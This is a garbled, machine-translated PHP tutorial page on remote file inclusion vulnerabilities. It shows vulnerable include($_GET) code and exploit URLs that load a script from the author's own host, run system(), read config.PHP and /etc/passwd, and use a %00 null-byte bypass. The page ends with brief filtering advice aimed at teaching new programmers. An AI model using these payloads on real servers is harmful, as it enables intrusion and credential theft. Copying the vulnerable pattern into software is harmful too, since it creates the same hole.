Home > Article > Backend Development > What causes PHP remote file inclusion vulnerability_PHP Tutorial
What causes PHP remote file inclusion vulnerability_PHP Tutorial
- WBOYOriginal
- 2016-07-22 09:02:221270browse
For junior PHP programmers, they still cannot fully grasp the security of PHP. First we need to understand the principles that cause program vulnerabilities. Let’s introduce the causes of PHPremote file inclusion vulnerability.
The first question is, what is a "remote file inclusion vulnerability"? The short answer is that the server executes a malicious file through PHP's lax filtering of arbitrary file inclusions. This is a programmer's filtering problem. Please remember that all CGI programs have such bugs.
1. Find out the PHP remote file inclusion vulnerability bug:
In order to find the target, we must first know the meaning of include two words. In all languages (most) there is this method to include arbitrary files. In PHP, we use the include() function and its workflow:
If you include include1.PHP in Main.PHP, I would write include("include1.PHP") like this. It's not very scientific, but you have to Know why.
Let’s look at this first. When the user input is passed, the file is included, which is
<ol class="dp-c">
<li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br>
) { </span></span></li>
<li>
<span class="keyword">include</span><span> </span><span class="vars">$_GET</span><span> <br>
; </span>
</li>
<li class="alt">
<span>} </span><span class="keyword">else</span><span> { </span>
</li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
</ol>
This structure is common in dynamic websites. The problem is that it allows this [url]hxxp://www.target. com/explame.PHP?page=main.PHP[/url] or [url]hxxp://www.target.com/explame.PHP?page=downloads.PHP[/url] to view. In any case, it would be very sad if you have such a bug in your program. You can only be blamed. Although it is just a filtering problem, it is this filtering that has Script hacker. In the survey of zone-h.org, The attack rate contained in the file accounts for 9.4%, which is enough for us to pay attention to, and it is not a problem of a day or two. It existed a few years ago, but today, batches of programmers are still following the old path, so it is With this article, writing such articles in 2004 has become cliché, but I still have to write it. After all, it is not called complaining when it can make people gain.
2. Test
Here is an example of remote file inclusion, with only one purpose. For the safety of your program, let’s look at the specific ones
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?</span><span class="attribute">page</span><span>=</span><span class="attribute-value">zizzy</span><span>[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(zizzy): failed to open stream: No such file or directory </span></li> <li><span> </span></li> <li class="alt"><span>in /var/www/htdocs/index.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'zizzy' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/index.PHP on line 3 </span> </li> </ol>
These error messages output by PHP tell us that the program I went to include the file /var/www/htdocs/zizzy, but it was not found. You see, No such file or directory. Now you understand the PHP remote file inclusion vulnerability.
3. It is really good to use
PHP, you can call files remotely, then I will create a yeah.txt and put it on my site [url]hxxp://www.mysite.com/yeah.txt. [/url]The content is like this
<ol class="dp-c"><li class="alt"><span><span>< ? </span></span></li><li><span class="func">echo</span><span> </span><span class="string">"Wow,test!"</span><span>; </span></li><li class="alt"><span>?> </span></span></li></ol>
Then
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li></ol>
echoes Wow, test!, and it is executed. It's not difficult to read config.PHP, it contains the mysql password. Write yeah.txt and try it as system(). What do you think? If you go too far, submit page=../../../../../../../etc /passwd. Now you know what true inclusion means.
4. Another principle of PHP remote file inclusion vulnerability
Sometimes programmers change the way of writing, writing like this, limiting the scope of inclusion
<ol class="dp-c">
<li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br>
) { </span></span></li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"$_GET <br>
.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
<li>
<span class="keyword">else</span><span> </span>
</li>
<li class="alt"><span>{ </span></li>
<li>
<span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span>
</li>
<li class="alt"><span>} </span></li>
</ol>
We submit
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main([url]hxxp://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: </span></li> <li><span> </span></li> <li class="alt"><span>hxxp request failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'hxxp://www.mysite.com/yeah.txt.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
Failed to include, limiting The suffix is PHP, change mysite.com's yeah.txt to yeah.PHP, and then execute it as usual. What about passwd?
<ol class="dp-xml"> <li class="alt"><span><span>Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: hxxp request </span></span></li> <li><span> </span></li> <li class="alt"><span>failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
Use a NUL character here, which is %00 to skip detection
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa.../etc/passwd%00[/url] </span></span></li></ol>
See it.
When including files, it is best to specify which file to include, or filter the submitted variables. This is the purpose of this PHP remote file inclusion vulnerability article. It is not written for hackers, but for those who are new to it. For those who are involved in programmers, there are many articles like this on the Internet. As long as someone benefits, the purpose will be achieved.